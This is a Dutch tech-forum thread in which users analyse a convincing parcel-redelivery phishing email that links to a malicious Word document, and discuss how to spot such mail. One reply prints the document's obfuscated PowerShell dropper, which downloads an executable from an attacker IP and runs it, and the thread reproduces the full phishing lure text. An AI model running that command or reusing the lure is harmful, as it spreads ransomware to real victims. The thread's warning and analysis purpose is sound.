Toon posts:

Vrij overtuigende mail met virus

Pagina: 1
Acties:

woensdag 3 mei 2017 22:42

Acties:
  • 0 Henk 'm!
  • Keiichi
  • Registratie: Juni 2005
  • Laatst online: 13-10 14:20

Keiichi

Topicstarter
Van een gemiddeld virusje in m'n mailbox sta ik niet zo erg te kijken. Een weldenkend iemand zou er ook niet zonder meer in trappen, maar ik had zojuist eentje ontvangen waar het bericht als volgt van is:
Geachte heer / mevrouw,

Op woensdag 3 mei om 16:51 heeft een van onze chauffeurs geprobeerd om een pakket voor *mijn bedrijf* af te leveren op het onderstaande adres.

*mijn bedrijf*
*kloppend adres*
*kloppende postcode en plaats*

Door onbekende redenen is het onze chauffeur niet gelukt om deze bestelling te bezorgen. Wij willen u verzoeken om een nieuwe afspraak te maken om alsnog deze levering te voltooien.

Om een nieuwe afspraak te maken dient u het afsprakenformulier dat automatisch voor u is gegenereerd van onze website te downloaden en in te vullen. U kunt dit formulier vervolgens mailen naar planning@*faillietbedrijf*.com
Het is tevens mogelijk om de bestelling op een ander adres te laten bezorgen.

Het afsprakenformulier is te vinden op onze website: http://*faillietbedrijf*/formulieren/6328961.doc

Alle benodigde gegevens alsmede de afzeneders en inhoud van het pakket zijn te vinden in het bovenstaande formulier.

Let op! het is alleen mogelijk om een nieuwe afspraak via het afsprakenformulier te maken. Het is niet mogelijk om telefonisch of op een andere manier een nieuwe afspraak te maken.


Met vriendelijke groet,

*een naam van iemand die ik niet ken, maar wel even geanonimiseerd*

Disclaimer: De informatie in dit bericht, inclusief eventuele bijlage(s), is vertrouwelijk en uitsluitend bestemd voor de geadresseerde. Verstrekking aan en gebruik door anderen dan de geadresseerde is zonder toestemming niet toegestaan.
Het domein lijkt te zijn van een logistiek bedrijf, dat schijnbaar al paar jaar failliet is. Domein lijkt dan ook door een malifide partij geregistreerd te zijn nadat het domein is komen te vervallen (denk logisch na een faillissement)

Is er iemand die dergelijke mails voor verspreiding van virussen/trojans/malware al eens heeft langs zien komen? Het klinkt op het eerste gezicht allemaal heel legitiem.

Virustotal op het .doc document: https://www.virustotal.co...9d51/analysis/1493843572/

Solar @ Dongen: http://solar.searchy.net/ - Penpal International: http://ppi.searchy.net/

woensdag 3 mei 2017 22:46

Acties:
  • 0 Henk 'm!
  • CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

Tja, je weet zelf het beste of zij daadwerkelijk naar jouw bedrijf een pakketje hebben gebracht, toch? :?

[ Voor 4% gewijzigd door CH4OS op 03-05-2017 22:47 ]

donderdag 4 mei 2017 08:02

Acties:
  • 0 Henk 'm!
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 13:33

lordgandalf

Gezien de virustotal resultaten zou ik het word documentje never nooit openen en dit is een bekende strategie van spammer. sturen een mailtje met een link naar een infected website of een bestandje en dan ben je onderdeel van een botnet als je het opent.

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

donderdag 4 mei 2017 08:09

Acties:
  • 0 Henk 'm!
  • Slavy
  • Registratie: December 2007
  • Niet online

Slavy

The War Drags Ever On!

Keiichi schreef op woensdag 3 mei 2017 @ 22:42:
Is er iemand die dergelijke mails voor verspreiding van virussen/trojans/malware al eens heeft langs zien komen? Het klinkt op het eerste gezicht allemaal heel legitiem.
Dat is juist wat men als "spam" verspreider toch wilt bereiken? Vaak genoeg mensen op neppe KPN facturen zien klikken terwijl men geen klant was bij KPN, neppe ebay/amazon links zien aanklikken, noem het maar op. Gewoon weggooien.

Come hear the moon is calling, The witching hour draws near, Hold fast the sacrifice, For now it's the time to die, All hell breaks loose, WITCHING HOUR!

donderdag 4 mei 2017 08:25

Acties:
  • +1 Henk 'm!
  • FlipFluitketel
  • Registratie: Juli 2002
  • Laatst online: 20:09

FlipFluitketel

Frontpage Admin
Keiichi schreef op woensdag 3 mei 2017 @ 22:42:
Is er iemand die dergelijke mails voor verspreiding van virussen/trojans/malware al eens heeft langs zien komen? Het klinkt op het eerste gezicht allemaal heel legitiem.
Ja ;)

Zie ook hier, hier en hier en vast nog wel meer sites waar het op te vinden is.

There are only 10 types of people in the world...those who understand binary and those who don't.
Jeremy Clarkson: It’s, um, a mobile phone holder, or as Richard Hammond calls it, a seat!

donderdag 4 mei 2017 08:39

Acties:
  • +2 Henk 'm!
  • Metalfreak
  • Registratie: April 2003
  • Laatst online: 17:20

Metalfreak

Hoije woh!

CH40S schreef op woensdag 3 mei 2017 @ 22:46:
Tja, je weet zelf het beste of zij daadwerkelijk naar jouw bedrijf een pakketje hebben gebracht, toch? :?
Hier op het werk krijgen we ze ook wel eens, maar met de vele duizenden pakketten die we dagelijks krijgen via 'tig transporteurs: Nee, dat weet je zomaar niet.

Aan mensen die me ipv mijn gebruiken: hebben jullie in het echt ook zo'n spraakgebrek?

donderdag 4 mei 2017 11:03

Acties:
  • 0 Henk 'm!
  • CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

Metalfreak schreef op donderdag 4 mei 2017 @ 08:39:
Hier op het werk krijgen we ze ook wel eens, maar met de vele duizenden pakketten die we dagelijks krijgen via 'tig transporteurs: Nee, dat weet je zomaar niet.
Sorry, maar als je al zoveel pakketten op een dag krijgt, zul je ook wel eigen referenties meegeven aan die pakketten, zodat je weet waar het pakket heen moet binnen de organisatie. Kleine moeite om dan te controleren of de referentie klopt. ;)

donderdag 4 mei 2017 11:21

Acties:
  • +1 Henk 'm!
  • FooLsKi
  • Registratie: Augustus 2005
  • Laatst online: 16:42

FooLsKi

Prutz0r 4 Life

CH40S schreef op donderdag 4 mei 2017 @ 11:03:
[...]
Sorry, maar als je al zoveel pakketten op een dag krijgt, zul je ook wel eigen referenties meegeven aan die pakketten, zodat je weet waar het pakket heen moet binnen de organisatie. Kleine moeite om dan te controleren of de referentie klopt. ;)
In een ideale wereld misschien wel. Ik krijg ook regelmatig pakketten op werk zonder vooraankondiging (al vraag ik daar wel telkens om). Grote voordeel hier is wel dat pakketten altijd bij de postkamer afgeleverd kunnen worden, dus dergelijke spammails verdwijnen hier zonder openen onder Shift-Delete.

Hoezo, ik zit je raar aan te kijken? Zo kijk ik altijd! Slijpen is niet nodig, ik prefereer de botte bijl.

donderdag 4 mei 2017 11:22

Acties:
  • 0 Henk 'm!
  • Metalfreak
  • Registratie: April 2003
  • Laatst online: 17:20

Metalfreak

Hoije woh!

CH40S schreef op donderdag 4 mei 2017 @ 11:03:
[...]
Sorry, maar als je al zoveel pakketten op een dag krijgt, zul je ook wel eigen referenties meegeven aan die pakketten, zodat je weet waar het pakket heen moet binnen de organisatie. Kleine moeite om dan te controleren of de referentie klopt. ;)
En jij denkt dat dat bij alle pakketten goed gaat? Alle pakketten worden bij 1 dock afgeleverd, die kunnen niet voor elk doosje afzonderlijk gaan kijken of het referentienummer klopt. Voor grote zendingen: ja, dan werkt dat zo, maar voor kleine losse doosjes is dat geen doen binnen een logistieke organisatie. Die worden gecontroleeerd nadat ze binnen zijn gekomen en niet alles heeft een duidelijk referentienummer getuige de vele pakketjes die soms te lang door het bedrijf van afdeling naar afdeling gaan.

Aan mensen die me ipv mijn gebruiken: hebben jullie in het echt ook zo'n spraakgebrek?

donderdag 4 mei 2017 11:23

Acties:
  • +1 Henk 'm!
  • RemcoDelft
  • Registratie: April 2002
  • Laatst online: 03-05 10:30

RemcoDelft

lordgandalf schreef op donderdag 4 mei 2017 @ 08:02:
Gezien de virustotal resultaten zou ik het word documentje never nooit openen
Is Microsoft Word nu nog steeds niet in staat ervoor te zorgen dat iets onbenulligs als een document geen rechten krijgt op het systeem?

donderdag 4 mei 2017 11:25

Acties:
  • 0 Henk 'm!
  • anboni
  • Registratie: Maart 2004
  • Laatst online: 22:00

anboni

CH40S schreef op donderdag 4 mei 2017 @ 11:03:
[...]
Sorry, maar als je al zoveel pakketten op een dag krijgt, zul je ook wel eigen referenties meegeven aan die pakketten, zodat je weet waar het pakket heen moet binnen de organisatie. Kleine moeite om dan te controleren of de referentie klopt. ;)
En die referentie staat dus (volgens het mailtje) alleen in het bijgevoegde word document |:(

donderdag 4 mei 2017 11:29

Acties:
  • 0 Henk 'm!
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 13:33

lordgandalf

RemcoDelft schreef op donderdag 4 mei 2017 @ 11:23:
[...]

Is Microsoft Word nu nog steeds niet in staat ervoor te zorgen dat iets onbenulligs als een document geen rechten krijgt op het systeem?
Zover ik weet zijn er wel wat aanpassingen gemaakt door microsoft maar het is nog bij lange niet waar het moet zijn

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

donderdag 4 mei 2017 11:31

Acties:
  • 0 Henk 'm!
  • Garyu
  • Registratie: Mei 2003
  • Laatst online: 16:25

Garyu

WW

CH40S schreef op donderdag 4 mei 2017 @ 11:03:
[...]
Sorry, maar als je al zoveel pakketten op een dag krijgt, zul je ook wel eigen referenties meegeven aan die pakketten, zodat je weet waar het pakket heen moet binnen de organisatie. Kleine moeite om dan te controleren of de referentie klopt. ;)
En dat gaat nooit mis denk je? Een medewerker die iets besteld heeft, maar vergeten is zijn eigen naam er op te laten zetten bijvoorbeeld. Dat komt bij elk beetje groter bedrijf regelmatig voor. En bij de berg verschillende transportbedrijven die komen en gaan lijkt een foutje snel gemaakt.

It's Difficult to Make Predictions - Especially About the Future

donderdag 4 mei 2017 11:38

Acties:
  • 0 Henk 'm!
  • CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

Metalfreak schreef op donderdag 4 mei 2017 @ 11:22:
[...]


En jij denkt dat dat bij alle pakketten goed gaat? Alle pakketten worden bij 1 dock afgeleverd, die kunnen niet voor elk doosje afzonderlijk gaan kijken of het referentienummer klopt. Voor grote zendingen: ja, dan werkt dat zo, maar voor kleine losse doosjes is dat geen doen binnen een logistieke organisatie. Die worden gecontroleeerd nadat ze binnen zijn gekomen en niet alles heeft een duidelijk referentienummer getuige de vele pakketjes die soms te lang door het bedrijf van afdeling naar afdeling gaan.
Zal niet 100% goed gaan, maar zo kan je wel toch zeker 90% of meer al filteren, dan is het risico geminimaliseerd.

donderdag 4 mei 2017 11:44

Acties:
  • 0 Henk 'm!
  • Viper®
  • Registratie: Februari 2001
  • Niet online

Viper®

lordgandalf schreef op donderdag 4 mei 2017 @ 11:29:
[...]


Zover ik weet zijn er wel wat aanpassingen gemaakt door microsoft maar het is nog bij lange niet waar het moet zijn
Misschien dat ik hopeloos achterloop maar door het simpelweg openen van een .docx bestand kan je toch niet geïnfecteerd raken?

Moet er dan niet minstens een macro of executable gestart worden?

Probleem is dat de meeste gebruikers gewoon maar op yes, accepteren en ok klikken.

donderdag 4 mei 2017 11:45

Acties:
  • 0 Henk 'm!
  • Stoelpoot
  • Registratie: September 2012
  • Niet online

Stoelpoot

RemcoDelft schreef op donderdag 4 mei 2017 @ 11:23:
[...]

Is Microsoft Word nu nog steeds niet in staat ervoor te zorgen dat iets onbenulligs als een document geen rechten krijgt op het systeem?
Is het niet zo dat je als gebruiken zo'n melding krijgt of een bestand scripts uit kan voeren, waar mensen dan achteloos maar JA op klikken?

donderdag 4 mei 2017 11:56

Acties:
  • 0 Henk 'm!
  • Sneezydevil
  • Registratie: Januari 2002
  • Laatst online: 29-09 10:22

Sneezydevil

Grote kans dat de RTF HTA exploit gebruikt wordt en daar was volgens mij geen interactie nodig en de extensie is dan ook .doc. Dus toch goed om te zorgen dat je updates draait.

[ Voor 16% gewijzigd door Sneezydevil op 04-05-2017 11:56 ]

donderdag 4 mei 2017 12:16

Acties:
  • 0 Henk 'm!
  • lordgandalf
  • Registratie: Februari 2002
  • Laatst online: 13:33

lordgandalf

Viper® schreef op donderdag 4 mei 2017 @ 11:44:
[...]

Misschien dat ik hopeloos achterloop maar door het simpelweg openen van een .docx bestand kan je toch niet geïnfecteerd raken?

Moet er dan niet minstens een macro of executable gestart worden?

Probleem is dat de meeste gebruikers gewoon maar op yes, accepteren en ok klikken.
Ligt er geloof ik aan hoe je admin het insteld volgens mij zitten er een aantal maatregelen in die het blokkeren en dan vragen wil je de scripts uitvoeren.
Iedere gebruiker klikt natuurlijk op ja dus dat beschermtje niet.

Steam: Profile / Socialclub: Profile / Uplay: minedwarf / Origin: lordgandalf3

donderdag 4 mei 2017 12:49

Acties:
  • 0 Henk 'm!
  • Udrene
  • Registratie: Oktober 2014
  • Nu online

Udrene

Als ik een pakketje, van welke vervoerder dan ook, krijg hoef ik nooit een pdf- of wordbestand in te vullen. Als dat wel zo is gaan bij mij de alarmbellen rinkelen. Meestal krijg je een link naar een webpagina om de afleverdatum te wijzigen o.i.d..

donderdag 4 mei 2017 13:01

Acties:
  • 0 Henk 'm!
  • anboni
  • Registratie: Maart 2004
  • Laatst online: 22:00

anboni

Udrene schreef op donderdag 4 mei 2017 @ 12:49:
Als ik een pakketje, van welke vervoerder dan ook, krijg hoef ik nooit een pdf- of wordbestand in te vullen. Als dat wel zo is gaan bij mij de alarmbellen rinkelen. Meestal krijg je een link naar een webpagina om de afleverdatum te wijzigen o.i.d..
Tja, bij mensen met enige technische affiniteitdenkvermogen werkt dat zo. Bij de meeste mensen gaan er nog geen alarmbellen rinkelen als ze van de (nederlandstalige) collega in de kamer naast ze een mailtje in het duits ontvangen met een link naar een verder ongespecificeerde factuur. Gisteren ook weer twee of drie mensen gehad die zonder verder na te denken op het linkje in de mail klikken. Gelukkig hielden de technische voorzieningen (virusscanner en firewall met web filtering) de ellende dit keer tegen, maar je weet gewoon dat het een keer misgaat :/

donderdag 4 mei 2017 13:36

Acties:
  • 0 Henk 'm!
  • Celluiar
  • Registratie: Augustus 2009
  • Laatst online: 17-09 10:36

Celluiar

Keiichi schreef op woensdag 3 mei 2017 @ 22:42:


[...]

Om een nieuwe afspraak te maken dient u het afsprakenformulier dat automatisch voor u is gegenereerd van onze website te downloaden en in te vullen. U kunt dit formulier vervolgens mailen naar planning@*faillietbedrijf*.com
Het is tevens mogelijk om de bestelling op een ander adres te laten bezorgen.

Het afsprakenformulier is te vinden op onze website: http://*faillietbedrijf*/formulieren/6328961.doc

Alle benodigde gegevens alsmede de afzeneders en inhoud van het pakket zijn te vinden in het bovenstaande formulier.

Let op! het is alleen mogelijk om een nieuwe afspraak via het afsprakenformulier te maken. Het is niet mogelijk om telefonisch of op een andere manier een nieuwe afspraak te maken.


Met vriendelijke groet,

*een naam van iemand die ik niet ken, maar wel even geanonimiseerd*

Disclaimer: De informatie in dit bericht, inclusief eventuele bijlage(s), is vertrouwelijk en uitsluitend bestemd voor de geadresseerde. Verstrekking aan en gebruik door anderen dan de geadresseerde is zonder toestemming niet toegestaan.
Er gaan toch wel wat alarmbellen rinkelen als er zo vaak naar een bijlage wordt verwezen... :+
Desalniettemin zijn er helaas genoeg mensen die toch de bijlage openen, dat zal altijd zo blijven ben ik bang...

donderdag 4 mei 2017 21:38

Acties:
  • 0 Henk 'm!
  • Squ1zZy
  • Registratie: April 2011
  • Niet online

Squ1zZy

Het bestand start een PowerShell op met een payload wat vervolgens een executable download en start die je terug kan vinden in je appdata:

PowerShell:
1
2

(NEw-obJECT SYSteM.net.WEbclieNT).dOWNLOadfILE(http://185.145.130.29/software.xz,$ENV:aPPDaTA\softwareoutput.exe);
iNvoke-itEM $EnV:aPpDaTa\softwareoutput.exe


Je zou de executable kunnen downloaden en laten scannen om te kijken wat het doet. Ik zit helaas achter me macbook en helaas ook geen tijd anders had ik het wel willen doen.

Dit wordt gebruikt om je AV te omzeilen.
Echter zou je AV wel moeten gaan piepen bij het uitvoeren van de executable.

Edit:
Hier de scan van de executable op virustotal LINK
Hier de scan van de executable op malwr LINK

Overduidelijk ransomware ...

[ Voor 22% gewijzigd door Squ1zZy op 04-05-2017 22:59 ]

vrijdag 5 mei 2017 11:44

Acties:
  • 0 Henk 'm!
  • Amens
  • Registratie: Juni 2011
  • Laatst online: 15-10 09:06

Amens

Dit is inderdaad ransomware, ik heb redelijk wat werk (van klanten) gehad door deze mail.

vrijdag 5 mei 2017 11:47

Acties:
  • 0 Henk 'm!
  • Viper®
  • Registratie: Februari 2001
  • Niet online

Viper®

Voor zaken die ik niet helemaal vertrouw gebruik ik vaak Sandboxie, zover ik weet geeft dat een redelijke beschermlaag tussen applicatie en direct OS/system

vrijdag 5 mei 2017 11:48

Acties:
  • 0 Henk 'm!

Verwijderd

Al meerdere slachtoffers gezien met dezelfde mail, niet openen dus.


or else..
Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq